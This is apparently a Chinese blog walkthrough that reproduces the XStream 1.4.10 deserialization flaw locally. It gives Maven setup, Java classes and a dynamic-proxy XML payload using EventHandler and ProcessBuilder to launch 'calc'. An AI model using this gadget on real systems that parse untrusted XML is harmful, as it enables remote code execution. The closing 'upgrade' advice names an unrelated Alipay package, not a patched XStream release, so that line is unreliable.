XStream反序列化漏洞测试实践

XStream是一个将java对象序列化为xml以及从xml反序列化为java对象的开源类库。

1.idea创建maven项目

2.pom.xml中引入漏洞版本依赖

<dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.10</version>
        </dependency>
    </dependencies>

　　

3.创建person类

class Person
{
    private String name;
    private int age;
    public Person(String name,int age)
    {
        this.name=name;
        this.age=age;
    }
    @Override
    public String toString()
    {
        return "Person [name=" + name + ", age=" + age + "]";
    }

　　

4.创建main函数，测试一下

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;

public class Main {
    public static void main(String args[]) throws Exception{
        /*XML序列化*/
        Person person=new Person("张四",19);
        XStream xstream = new XStream(new DomDriver());//生成并设置XML解析器
        //序列化
        String xml = xstream.toXML(person);
        System.out.println(xml);
        //反序列化
        person=(Person)xstream.fromXML(xml);
        System.out.println(person);


    }
}

　　

 可以看到的是，已经提示了XStream存在风险了。

5.创建一个interface

public interface Car {
    void start();
    void run();
    void stop();
}

　　

6.创建一个1.xml文件,放到resources目录下

<dynamic-proxy>
    <interface>Car</interface>
    <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
            <command>
                <string>calc</string>
            </command>
        </target>
        <action>start</action>
    </handler>
</dynamic-proxy>

　　

6.创建一个类执行反序列化

import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.InputStream;

public class Rcetest {
    public void rcetest() throws FileNotFoundException {
        String path = this.getClass().getClassLoader().getResource("1.xml").getPath();
        InputStream in = new FileInputStream(path);
        XStream xs = new XStream();
        Car c = (Car)xs.fromXML(in);
        c.run();
    }
}

　　

7.main运行

public class Main {
    public static void main(String args[]) throws Exception{
        /*XML序列化*/
        /*Person person=new Person("张四",19);
        XStream xstream = new XStream(new DomDriver());//生成并设置XML解析器
        //序列化
        String xml = xstream.toXML(person);
        System.out.println(xml);
        //反序列化
        person=(Person)xstream.fromXML(xml);
        System.out.println(person);*/
        Rcetest mytest =new Rcetest();
        mytest.rcetest();



    }
}

　　

之后再花时间分析原因吧

建议升级版本：

<dependency>
        <groupId>com.alipay.fc.supergw</groupId>
        <artifactId>fcsupergw-unimsg</artifactId>
        <version>2.0.0.20200805</version>
</dependency>